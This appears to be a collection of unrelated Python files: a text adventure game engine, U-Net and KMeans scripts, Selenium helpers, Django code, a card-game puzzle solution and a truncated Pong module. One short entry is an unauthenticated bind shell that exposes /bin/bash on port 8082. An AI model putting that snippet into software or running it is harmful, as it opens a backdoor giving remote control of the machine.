limit = limit or len(adjectives)
drops_i = []
for k, v in dictionary.items():
quantity = dropper(v['rarity'])
quantity = quantity if quantity < limit else limit
limit -= quantity
if quantity:
if quantity > 1 and v['category'] != 'residence':
n = random.randint(0, quantity)
unique_names = find_unique_names(quantity - n, names, p.square.unique_building_names)
p.square.unique_building_names += unique_names
for i in range(0, quantity - n):
drops_i.append(Building(name=f"{unique_names[i]}'s {remove_little_words(k).capitalize()}", p=p, **v))
unique_adjectives = find_unique_names(n, adjectives, p.square.unique_building_names)
p.square.unique_building_names += unique_adjectives
for i in range(0, n):
drops_i.append(Building(name=f"the {unique_adjectives[i]} {remove_little_words(k).capitalize()}", p=p, **v))
elif quantity > 1 and v['category'] == 'residence':
unique_house_names = find_unique_names(quantity, names, p.square.unique_house_names)
p.square.unique_house_names += unique_house_names
for i in range(0, quantity):
drops_i.append(Building(name=f"{unique_house_names[i]}'s {remove_little_words(k)}", p=p, **v))
else:
drops_i.append(Building(name=k, p=p, **v))
return drops_i
def drop_mob(dictionary, p, limit=None, square=None):
square = square or p.square
limit = limit or len(names) - len(square.unique_mob_names)
drops_i = []
for k, v in dictionary.items():
quantity = dropper(v['rarity'])
quantity = quantity if quantity < limit else limit
limit -= quantity
if quantity:
if quantity > 1:
unique_names = find_unique_names(quantity, names, square.unique_mob_names)
p.square.unique_mob_names += unique_names
for i in range(0, len(unique_names)):
drops_i.append(Mob(name=f"{k} named {unique_names[i]}", p=p, **v))
else:
if k not in [n.name for n in p.square.mobs]:
drops_i.append(Mob(name=k, p=p, **v))
else:
name = find_unique_names(1, names, square.unique_mob_names)[0]
drops_i.append(Mob(name=f"{k} named {name}", p=p, **v))
return drops_i
def drop_item(dictionary):
""" Randomly generates objects based on rarity """
drops_i = []
for k, v in dictionary.items():
quantity = dropper(v['rarity'])
if quantity:
drops_i.append(Item(name=k, quantity=quantity, **v))
return drops_i
class MapSquare:
def __init__(self, name="", square_type=None):
square_types = ["forest", "mountains", "desert", "city", "swamp", "ocean"]
self.square_type = square_type or square_types[random.randint(0, len(square_types) - 1)]
self.name = name
self.unique_mob_names = []
self.unique_building_names = []
self.unique_house_names = []
mobs = []
items = []
buildings = []
def generate_items(self):
self.items = drop_item(add_dicts_together(items["master"], items[self.square_type]))
def generate_buildings(self, p):
self.buildings = drop_building(add_dicts_together(buildings["master"], buildings[self.square_type]), p)
def generate_mobs(self, p):
self.mobs = drop_mob(add_dicts_together(wild_mobs["master"], wild_mobs[self.square_type]), p)
def clean_up_map(self):
""" Remove items with quantity of zero from the map inventory"""
self.items = [i for i in self.items if i.quantity != 0]
@staticmethod
def map_picture(the_map, p):
"""With the player's location in the center, draw a 5 x 5 map with map square type
and coordinates in each square"""
xy = (p.location[0] - 2, p.location[1] + 2)
map_coords = []
for y in range(0, 5):
row = [(xy[0] + x, xy[1] - y) for x in range(0, 5)]
map_coords.append(row)
pretty_map = []
for r in map_coords:
row = []
for coordinates in r:
if coordinates in the_map.keys():
if p.quest and p.job and p.quest[1] == coordinates and p.job.location == coordinates:
star = '*$ '
elif p.quest and p.quest[1] == coordinates:
star = ' * '
elif p.job and p.job.location == coordinates:
star = ' $ '
else:
star = ' '
row.append("|{!s:9}{}|".format(the_map[coordinates].square_type, star))
else:
row.append("|{!s:12}|".format(' '))
pretty_map.append(row)
for row in pretty_map:
print(''.join(row))
class Player:
def __init__(self, name, location):
self.name = name
self.location = location
self.square = None
self.money = 0
self.quest = None
self.job = None
self.phase = "day"
self.equipped_weapon = None
self.major_armor = None
self.minor_armor = None
self.building_local = None
self.inventory = []
self.skills = {}
self.health = 100
self.greeting_count = 0
self.body_count = 0
self.assassination_count = 0
self.hit_list = []
self.death_count = 0
# TODO increase insurance cost every death?
self.food_count = 0
self.run_away_count = 0
self.speed_bonus = False
self.game_won = False
def game_over(self):
if self.game_won is False:
self.game_won = True
print(colored("You have won the game!", "green"))
print("You may continue playing to earn more achievements if you wish.")
if self.run_away_count == 0:
print("Congratulations, you have achieved the True Bravery achievement, having won the game without ever running away from a fight.")
if self.run_away_count > 100:
print("Congratulations, you have achieved the True Cowardice achievement, having won the game after running away from over 100 battles.")
def clean_up_inventory(self):
""" Remove items with quantity of zero from the map inventory"""
self.inventory = [i for i in self.inventory if i.quantity != 0]
def phase_change(self, the_map):
self.phase = 'day' if self.phase == 'night' else 'night'
for k, square in the_map.items():
if self.location != k:
square.generate_items()
for b in square.buildings:
if b.ware_list:
b.wares = drop_item(b.ware_list)
while not b.wares:
b.wares = drop_item(b.ware_list)
if b.name not in ('a castle', 'a volcanic base'):
jobs = {}
buiding_dict = add_dicts_together(buildings['master'], buildings[square.square_type])
for key, v in buiding_dict.items():
if key == b.name and v.get('jobs'):
for name, values in v['jobs'].items():
jobs[name] = values
b.jobs = b.drop_job(jobs)
if self.phase == 'day':
self.speed_bonus = False
for mob in square.mobs:
mob.health = 100
mob.irritation_level = 0
mob.quest = None if self.quest is None else mob.quest
if not square.mobs:
square.mobs = drop_mob(add_dicts_together(wild_mobs["master"], wild_mobs[self.square.square_type]),
self, limit=len(names), square=square)
def formatted_inventory(self):
formatted = []
for item in self.inventory:
if item.quantity > 1:
formatted.append(f"{int_to_words(item.quantity)} {item.plural}")
else:
formatted.append(item.name)
if formatted:
return comma_separated(formatted)
else:
return "nothing"
def pretty_inventory(self):
w = self.equipped_weapon
major = self.major_armor.defense if self.major_armor else 0
minor = self.minor_armor.defense if self.minor_armor else 0
armor_defense = (major + minor) * 5
armors = [self.major_armor.name if self.major_armor else None, self.minor_armor.name if self.minor_armor else None]
inventory = {'inventory_items': f"You have {self.formatted_inventory()} in your inventory.",
'weapon': f"You are wielding {int_to_words(w.quantity)} "
f"{remove_little_words(w.name) if w.quantity == 1 else w.plural}." if w else None,
'armor': f"You are wearing {' and '.join(x for x in armors if x)}, "
f"giving you a {armor_defense}% reduction in incoming damage." if self.minor_armor or self.major_armor else None}
return '\n'.join(v for v in inventory.values() if v)
def status(self):
skills = [f"{k}: {v}%." for k, v in self.skills.items()]
job = f"You have a job as a {self.job.name}." if self.job else None
quest = "You have a quest." if self.quest else None
if job and quest:
job_string = "\n".join([job, quest])
elif job or quest:
job_string = job if job else quest
else:
job_string = "You do not have a job, and you are not contributing to society."
status_string = {
'health': f'Currently, you have {self.health} health.',
'location': f'You are located on map coordinates {self.location}, '
f'which is {self.square.square_type}.',
'building_local': f'You are inside {self.building_local.name}.' if self.building_local else None,
'skills': '\n'.join(skills) if skills else "You don't have any skills.",
'money': f"You have ${self.money} in your wallet.",
'job': job_string}
return '\n'.join(v for v in status_string.values() if v)
def statistics(self):
print(f"You have killed {self.body_count} mobs.")
print(f"You have ran away from {self.run_away_count} battles.")
print(f"You have eaten {self.food_count} items.")
print(f"You have performed {self.assassination_count} assassinations.")
print(f"You have talked to mobs {self.greeting_count} times.")
def view_hit_list(self):
if self.hit_list:
print(f"If you ever run across these shady characters, be sure to take their names off your list: {comma_separated(self.hit_list)}")
else:
print("Looks like you don't know of anyone who needs to be dead.")
def increase_skill(self, skill, increase):
try:
self.skills[skill] += increase
except KeyError:
self.skills[skill] = increase
print(f"You have increased your mastery of {skill} by {increase}% for a total of {self.skills[skill]}%.")
class Item:
def __init__(self, name, quantity, plural, category=None, perishable=None,
flammable=None, rarity=None, price=None, weapon_rating=None, defense=None):
self.name = name
self.quantity = quantity
self.plural = plural
self.category = category or None
self.perishable = perishable or None
self.flammable = flammable or None
self.rarity = rarity or None
self.price = price or None
self.weapon_rating = weapon_rating or None
self.defense = defense or None
def copy(self):
return Item(name=self.name, quantity=self.quantity, plural=self.plural, category=self.category,
perishable=self.perishable, flammable=self.flammable, rarity=self.rarity,
weapon_rating=self.weapon_rating, defense=self.defense)
class Building(object):
def __init__(self, name, p, plural, category=None, rarity=None, ware_list=None, mobs=None, jobs=None):
self.name = name
self.p = p
self.quantity = 1
self.plural = plural
self.category = category or None
self.rarity = rarity or None
self.ware_list = ware_list
self.wares = self.drop_wares()
self.mobs = drop_mob(mobs, p) if mobs else None
self.jobs = self.drop_job(jobs) if jobs else None
if self.name in ('a castle', 'a volcanic base'):
self.boss_mobs_and_jobs()
def drop_wares(self):
if self.ware_list:
wares = drop_item(self.ware_list)
while not wares:
wares = drop_item(self.ware_list)
return wares
else:
return []
def drop_job(self, jobs):
drops_i = []
for k, v in jobs.items():
if odds(2):
drops_i.append(Job(name=k, location=self.p.location, **v))
return drops_i
def boss_mobs_and_jobs(self):
boss_major_armors = [Item('a coat of impervious dragon scales', plural='coats of dragon scales', quantity=1, category='major armor', rarity='super rare', defense=5),
Item('an enchanted leather duster', plural='enchanted leather dusters', quantity=1, category='major armor', defense=5, rarity='super rare'),
Item('a coat of actual live grizzly bears', plural='coats of actual live grizzly bears', quantity=1, category='major armor', defense=5, rarity='super rare')]
boss_minor_armors = [Item('wings of an angel', plural='wings of angels', quantity=1, rarity='super rare', category='minor armor', defense=5),
Item('an OSHA approved hard hat', plural='OSHA approved hard hats', quantity=1, rarity='super rare', category='minor armor', defense=5),
Item('a pair boots that were made for walkin', plural='pairs of boots that were made for walkin', quantity=1, rarity='super rare', category='minor armor', defense=5)]
boss_weapons = [Item('an apache helicopter', plural='apache helicopters', rarity='super rare', weapon_rating=6, quantity=1),
Item('a trebuchet', plural='trebuchets', weapon_rating=6, quantity=1, rarity='super rare'),
Item('an army of attacking wizards', plural='armies of attacking wizards', weapon_rating=6, quantity=1, rarity='super rare')]
boss_names = ["the Terrifying Dragon of Soul Slaying", "the Great Salamander of Darkness", "the Squirrel of Destiny", ]
random.shuffle(boss_names)
random.shuffle(boss_weapons)
random.shuffle(boss_major_armors)
random.shuffle(boss_minor_armors)
boss = Mob(boss_names[0], self.p, plural=boss_names[0], rarity='super rare')
boss.health = 500
boss.equipped_weapon = boss_weapons[0]
boss.major_armor = boss_major_armors[0]
boss.minor_armor = boss_minor_armors[0]
boss.irritation_level = 10
self.mobs = [boss]
if self.name == 'a castle':
self.jobs = [Job('king of the realm', location=self.p.location, salary=1100)]
if self.name == 'a volcanic base':
self.jobs = [Job('evil overlord', location=self.p.location, salary=1100)]
class Job:
def __init__(self, name, location, skills_needed=None, salary=0, skills_learned=None, inventory_needed=None):
self.name = name
self.location = location
self.skills_needed = skills_needed or None
self.salary = salary or 0
self.skills_learned = skills_learned or None
self.inventory_needed = inventory_needed or None
self.application_attempts = 0
class Mob:
def __init__(self, name, p, plural, rarity, inventory=None):
self.name = name
self.p = p
self.plural = plural
self.quantity = 1
self.rarity = rarity
self.skills = self.skills()
self.quest = None
self.inventory = inventory or drop_item(add_dicts_together(items['master'], items[p.square.square_type]))
self.health = 100
self.equipped_weapon = self.equip()
major = [x for x in self.inventory if x.category == 'major armor']
minor = [x for x in self.inventory if x.category == 'minor armor']
self.major_armor = major[0] if major else None
self.minor_armor = minor[0] if minor else None
self.irritation_level = 0
def equip(self):
nice_weapons = []
for i in self.inventory:
try:
if i.weapon_rating:
nice_weapons.append(i)
except AttributeError:
pass
nice_weapons.sort(key=lambda x: x.weapon_rating, reverse=True)
if nice_weapons:
self.inventory.remove(nice_weapons[0])
return nice_weapons[0]
else:
return None
@staticmethod
def skills():
""" Pick the skills for a mob, these determine what a player can get from completing a quest """
all_skills = ["strength", "patience", "cleanliness", "leadership", "communication",
"science", "math", "engineering", "intelligence", "driving"]
random.shuffle(all_skills)
return all_skills[0:2]
def generate_quest(self):
"""
inventory based
bring me x of an object to learn a skill
"""
if odds(3):
quest_items = add_dicts_together(items["master"], items[self.p.square.square_type])
quest_item = random.choice(list(quest_items.keys()))
i = Item(quest_item, 0, **quest_items[quest_item])
self.inventory.append(i)
quantity = {'super rare': '1',
'rare': '2',
'uncommon': '3',
'common': '6',
'super common': '15'}
q = quantity[i.rarity]
self.quest = i, int(q), f"{self.p.name}, if you bring " \
f"me {q} {i.plural if int(q) > 1 else remove_little_words(i.name)}, " \
f"I will teach you a valuable skill."
return
elif odds(5):
mobs = []
for biome, building in buildings.items():
for b, attributes in building.items():
if attributes.get('mobs'):
for k in attributes['mobs'].keys():
mobs.append(k)
for biome, mob in wild_mobs.items():
for k in mob.keys():
mobs.append(k)
target = f"{mobs[random.randint(0, len(mobs)-1)]} named {names[random.randint(0, len(names)-1)]}"
print(f"Well, we'll keep this off the record, but I can arrange for some money to find its way "
f"into your account if you make {colored(target, 'yellow')} disappear, if you know what I mean...")
self.p.hit_list.append(target)
return False
else:
return None
|
5,631 | abdf5aee77ee879c50d0e605d5fd95e28a7ef7aa | import Ploneboard
import PloneboardForum
import PloneboardConversation
import PloneboardComment
|
5,632 | ba379ed90bccd05d058f69f33a960779f8b8bcd5 | from model import *
from data import *
import os
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
data_gen_args = dict(horizontal_flip = True,
vertical_flip = True)
imageTargetSize = (256, 256)
trainPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/Training'
trainImagePath = 'Selected Images Training'
trainLabelPath = 'Selected Images Label Binarized Training'
#augTrainPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/train/aug'
#validationPath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/validation'
#validationImagePath = 'Selected Images Resized Validation'
#validationLabelPath = 'Selected Images Label Resized Binarized Validation'
trainGene = trainGenerator(batch_size = 1,
train_path = trainPath,
trainImage_folder = trainImagePath,
trainLabel_folder = trainLabelPath,
aug_dict = data_gen_args,
save_to_dir = None,
target_size = imageTargetSize,
trainImage_color_mode = 'grayscale',
trainLabel_color_mode = 'grayscale',
trainImage_save_prefix = 'Image',
trainLabel_save_prefix = 'Label',
seed = 1,
flag_multi_class = False,
num_class = 2)
""""
validationGene = validationGenerator(validation_path = validationPath,
validationImage_path = validationImagePath,
validationLabel_path = validationLabelPath,
target_size = imageTargetSize,
flag_multi_class = False,
as_gray = True)
"""
model = unet()
model_checkpoint = ModelCheckpoint('unet_testing.hdf5', monitor='loss',verbose=1, save_best_only=True)
trainHistory = model.fit_generator(trainGene,
steps_per_epoch=100,
epochs=7,
callbacks = [model_checkpoint]
)
testImagePath = '/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/Test/Selected Images Test'
testGene = testGenerator(test_path = testImagePath,
target_size = imageTargetSize,
flag_multi_class = False,
as_gray = True)
results = model.predict_generator(testGene, len(os.listdir(testImagePath)), verbose = 1)
saveResult("/work/scratch/zhangbin/EmbryoTracking_ClaireBinZhang/MotilityAnalysis/20160317 10 dpf 60 fps 15 min (2)/here", results)
training_loss = trainHistory.history['loss']
#test_loss = history.history['val_loss']
epoch_count = range(1, len(training_loss)+1)
plt.plot(epoch_count, training_loss, 'r--')
#plt.plot(epoch_count, test_loss, 'b-')
plt.legend(['Training Loss'])
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('U-Net Training Loss Function')
plt.show();
|
5,633 | bd419d0a197a5e5a99a370e45cdb53a276ac5507 | from sklearn import cluster
from sklearn.metrics import adjusted_rand_score
import matplotlib.pyplot as plt
def test_Kmeans(*data):
x,labels_true = data
clst = cluster.KMeans()
clst.fit(x)
predicted_labels = clst.predict(x)
print("ARI: %s" % adjusted_rand_score(labels_true, predicted_labels))
print("Sum center distance %s" % (clst.inertia_,))
def test_Kmeans_nclusters(*data):
"""
测试KMeans的聚类结果随参数n_clusters的参数的影响
在这里,主要分别研究ARI和所有样本距离各簇中心的距离值和随簇的个数
的变化情况
"""
x, labels_true = data
nums = range(1, 50)
ARIs = []
Distances = []
for num in nums:
clst = cluster.KMeans(n_clusters = num)
clst.fit(x)
predicted_labels = clst.predict(x)
ARIs.append(adjusted_rand_score(labels_true, predicted_labels))
Distances.append(clst.inertia_)
# 绘图
fig = plt.figure()
ax = fig.add_subplot(1, 2, 1)
ax.plot(nums, ARIs, marker = "+")
ax.set_xlabel("n_clusters")
ax.set_ylabel("ARI")
ax = fig.add_subplot(1, 2, 2)
ax.plot(nums, Distances, marker = "o")
ax.set_xlabel("n_cluster")
ax.set_ylabel("intertia_")
fig.suptitle("KMeans")
plt.show()
def test_KMeans_n_init(*data):
"""
该函数考察KMeans算法运行的次数和选择的初始中心向量策略的影响
"""
x, labels_true = data
nums = range(1, 50)
# 绘图
fig = plt.figure()
ARIs_k = []
Distances_k = []
ARIs_r = []
Distances_r = []
for num in nums:
clst = cluster.KMeans(n_init = num, init = "k-means++")
clst.fit(x)
predicted_labels = clst.predict(x)
ARIs_k.append(adjusted_rand_score(labels_true, predicted_labels))
Distances_k.append(clst.inertia_)
clst = cluster.KMeans(n_init = num, init = "random")
clst.fit(x)
predicted_labels = clst.predict(x)
ARIs_r.append(adjusted_rand_score(labels_true, predicted_labels))
Distances_r.append(clst.inertia_)
ax = fig.add_subplot(1, 2, 1)
ax.plot(nums, ARIs_k, marker = "+", label = "k-means++")
ax.plot(nums, ARIs_r, marker = "+", label = "random")
ax.set_xlabel("n_init")
ax.set_ylabel("ARI")
ax.set_ylim(0, 1)
ax.legend(loc = "best")
ax = fig.add_subplot(1, 2, 2)
ax.plot(nums, Distances_k, marker = "o", label = "k-means++")
ax.plot(nums, Distances_r, marker = "o", label = "random")
ax.set_xlabel("n_init")
ax.set_ylabel("inertia_")
ax.legend(loc = "best")
fig.suptitle("KMeans")
plt.show()
|
5,634 | 82fc86e44d02c45d7904139e4dfdff069e2bdb90 | import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser="chrome"):
driver = None
if browser == "chrome":
driver = webdriver.Chrome()
elif browser == "firefox":
driver = webdriver.Firefox()
elif browser == "ie":
driver = webdriver.Ie()
else:
# driver = None
print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
return driver
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window() # 窗口最大化
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))
return elements
def click(self, locator, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.click()
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(
EC.text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
|
5,635 | 508d016161131481ace41f3d3bda005423125fe5 | def parse(filename):
t1, t2 = open(filename).read().strip().split("\n\n")
return tuple(map(lambda x: list(map(int, x.split("\n")[1:])), [t1, t2]))
def score(deck):
res = 0
for i in range(len(deck)):
res += deck[i] * (len(deck)-i)
return res
def solution1(deck1, deck2):
while len(deck1) > 0 and len(deck2) > 0:
p1, p2 = deck1[0], deck2[0]
if p1 > p2:
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return score(deck1)
return score(deck2)
def can_recurse(deck1, deck2):
p1, p2 = deck1[0], deck2[0]
return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1
def combat(deck1, deck2):
db = set()
while len(deck1) > 0 and len(deck2) > 0:
key = (tuple(deck1), tuple(deck2))
if key in db:
return "p1", score(deck1)
db.add(key)
p1, p2 = deck1[0], deck2[0]
if can_recurse(deck1, deck2):
winner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])
else:
winner = "p1" if p1 > p2 else "p2"
if winner == "p1":
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return "p1", score(deck1)
return "p2", score(deck2)
def solution2(deck1, deck2):
return combat(deck1, deck2)[1]
def main():
print(solution1(*parse("sample.txt")))
print(solution1(*parse("input.txt")))
print(solution2(*parse("sample.txt")))
print(solution2(*parse("input.txt")))
if __name__ == "__main__":
main()
|
5,636 | be5178f013e639d5179ed1af380dd7a63044bff2 | import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
# 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码
ratings = pd.read_table(file_path, header=0,
sep=';', encoding='ISO-8859-1')
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(
min(ratings['Book-Rating']), ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == "__main__":
get_ratings(file_path='BX-Book-Ratings.csv')
|
5,637 | 38a2113c0531648a90cf70c4b18d640d5ebb3f47 | '''
quick and dirty remote shell using sockets and file descriptors
'''
import socket
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('',8082))
s.listen(1)
conn,__=s.accept()
os.dup2(conn.fileno(),0)
os.dup2(conn.fileno(),1)
#print("asdf")
os.system('/bin/bash')
conn.close()
|
5,638 | 6546d04d3755d62d1a8756bdec1a10f6f018dcea | from django.apps import AppConfig
class FitnerappConfig(AppConfig):
name = 'fitnerapp'
|
5,639 | 1babf9f27e6792d2a1c2545a1e3bcd08fefa0975 | import cv2
import numpy as np
import random
def main():
img = cv2.imread('test_image.png',0)
res = np.zeros((img.shape[0],img.shape[1],3),np.uint8)
thresh = cv2.threshold(img, 50, 255, 0)[1]
_, contours,_ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
cv2.drawContours(res, [cnt],0,(random.randint(0,255),random.randint(0,255) ,random.randint(0,255)),-1)
cv2.imshow('res',res)
cv2.waitKey(0)
if __name__ == "__main__":
main() |
5,640 | 8c3c066ed37fe0f67acfd2d5dc9d57ec2b996275 | def solution(A):
if not A:
return 1
elif len(A) == 1:
if A[0] == 1:
return 2
else:
return 1
A.sort()
prev = 0
for i in A:
if i != (prev + 1):
return i - 1
else:
prev = i
return prev + 1
|
5,641 | ea414835554ea3dcac2017036692cf178526f91b | # Generated by Django 3.0.7 on 2020-12-16 15:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('play', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='playerA',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('playerA', models.CharField(max_length=15)),
('join_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='play.Room')),
],
options={
'verbose_name_plural': 'PlayerA',
},
),
migrations.CreateModel(
name='playerB',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('playerB', models.CharField(max_length=15)),
('join_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='play.Room')),
],
options={
'verbose_name_plural': 'PlayerB',
},
),
migrations.DeleteModel(
name='Player',
),
]
|
5,642 | 74d1491280eba1ceb06ccf6f45546cdb41149687 | #!/usr/bin python3
# coding: utf-8
"""
AUTHOR: bovenson
EMAIL: szhkai@qq.com
FILE: 03.py
DATE: 17-9-25 下午7:59
DESC:
"""
from socket import socket
|
5,643 | 4cc1c8668a84cc6faadf60053568d155b8852c5f | # -*- coding: utf-8 -*-
"""Application configuration.
See https://github.com/sloria/cookiecutter-flask for configuration options with other flask-extensions
"""
import os
class Config(object):
"""Base configuration."""
SECRET_KEY = os.environ.get('DELIVERY_ASSISTANT_SECRET', 'secret-key') # TODO: Change me
APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory
PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))
# Flask-Assistant Integrations
ASSIST_ACTIONS_ON_GOOGLE = True
CLIENT_ACCESS_TOKEN = 'YOUR API.AI AGENT CLIENT ACCESS TOKEN'
DEV_ACCESS_TOKEN = 'YOUR API.AI AGENT DEVELOPER ACCESS TOKEN'
class ProdConfig(Config):
"""Production configuration."""
ENV = 'prod'
DEBUG = False
class DevConfig(Config):
"""Development configuration."""
ENV = 'dev'
DEBUG = True
class TestConfig(Config):
"""Test configuration."""
TESTING = True
DEBUG = True
|
5,644 | 2bbfbc597a4e1f8b46f58a4c6002a9943eff557a | # pylint: skip-file
from sorter.lib.request_data import read_url
from urllib2 import HTTPError
class fake_urllib(object):
def __init__(self, should_fail=False):
self.should_fail = should_fail
def urlopen(self, uri):
if self.should_fail == True:
raise HTTPError('FAKER.GTLD', 404, 'Four Oh Four', None, None)
def read(self):
return "fake body"
def close(self):
pass
class fake_logger(object):
def __init__(self):
self.msg = None
def info(self, msg, *args):
pass
def warn(self, msg, *args):
self.msg = msg.reason
class TestRequestData(object):
def test_read_url(self, monkeypatch):
monkeypatch.setattr("urllib2.urlopen", lambda foo: fake_urllib())
monkeypatch.setattr("sorter.lib.request_data.LOGGER", fake_logger())
body = read_url("fakeurl")
assert body == "fake body"
def test_read_url_404(self, monkeypatch):
faker = fake_logger()
monkeypatch.setattr("sorter.lib.request_data.urllib2", fake_urllib(True))
monkeypatch.setattr("sorter.lib.request_data.LOGGER", faker)
body = read_url("fakeurl")
assert body == None
assert faker.msg == 'Four Oh Four'
|
5,645 | 5d6ec1b23dcbc935fe80dd09a2e967eb7e37a363 | from knox.models import AuthToken
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from accounts.serializers import UserSerializer, RegisterSerializer, LoginSerializer, ChangePasswordSerializer
# Register API
class RegisterAPI(generics.CreateAPIView):
permission_classes = [
permissions.AllowAny
]
serializer_class = RegisterSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
return Response({
"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user)[1]
})
# Login API
class LoginAPI(generics.GenericAPIView):
serializer_class = LoginSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data
return Response({
"user": UserSerializer(user, context=self.get_serializer_context()).data,
"token": AuthToken.objects.create(user)[1]
})
class ChangePasswordAPI(generics.UpdateAPIView):
permission_classes = [
permissions.IsAuthenticated
]
serializer_class = ChangePasswordSerializer
def update(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = request.user
user.set_password(serializer.validated_data['new_password'])
user.save()
return Response({
'success': True,
}, status=status.HTTP_200_OK)
# Get User API
class UserAPI(generics.RetrieveUpdateAPIView):
permission_classes = [
permissions.IsAuthenticated,
]
serializer_class = UserSerializer
def get_object(self):
return self.request.user
def update(self, request, *args, **kwargs):
user = self.get_object()
first_name = request.data.get('first_name')
last_name = request.data.get('last_name')
mobile = request.data.get('mobile')
print(first_name, last_name, mobile)
user.first_name = first_name
user.last_name = last_name
user.mobile = mobile
user.save()
return Response({
"success": False
}, status=status.HTTP_200_OK)
|
5,646 | 3191fa5f9c50993d17e12e4e2e9d56cfce2108e7 | from flask_table import Table, Col
"""Lets suppose that we have a class that we get an iterable of from
somewhere, such as a database. We can declare a table that pulls out
the relevant entries, escapes them and displays them.
"""
class Item(object):
def __init__(self, name, category):
self.name = name
self.category = category
class Category(object):
def __init__(self, name):
self.name = name
class ItemTable(Table):
name = Col('Name')
category_name = Col('Category', attr_list=['category', 'name'])
# Equivalently: Col('Category', attr='category.name')
# Both syntaxes are kept as the second is more readable, but
# doesn't cover all options. Such as if the items are dicts and
# the keys have dots in.
def main():
items = [Item('A', Category('catA')),
Item('B', Category('catB'))]
tab = ItemTable(items)
print(tab.__html__())
if __name__ == '__main__':
main()
|
5,647 | 5485a1210a0c0361dbb000546ee74df725fad913 | #!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
"""
Das Pong-Spielfeld wird simuliert.
Court moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.
Jenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,
sowie einen Punktestand für beide Spieler (0 und 1).
Spieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.
Zwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,
welches alle Daten auf ein Interval [-1.0, 1.0] normiert.
"""
__author__ = "Daniel Speck, Florian Kock"
__copyright__ = "Copyright 2014, Praktikum Neuronale Netze"
__license__ = "GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Daniel Speck, Florian Kock"
__email__ = "2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de"
__status__ = "Development"
import numpy as np
import random
class court:
"""
Objekt, dass das Spielfeld darstellt.
Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:
- Skalierte Daten für die KNNs
- Unskalierte Daten für die Visualisierung
"""
def __init__(self):
"""
Initialisiert ein court-Objekt.
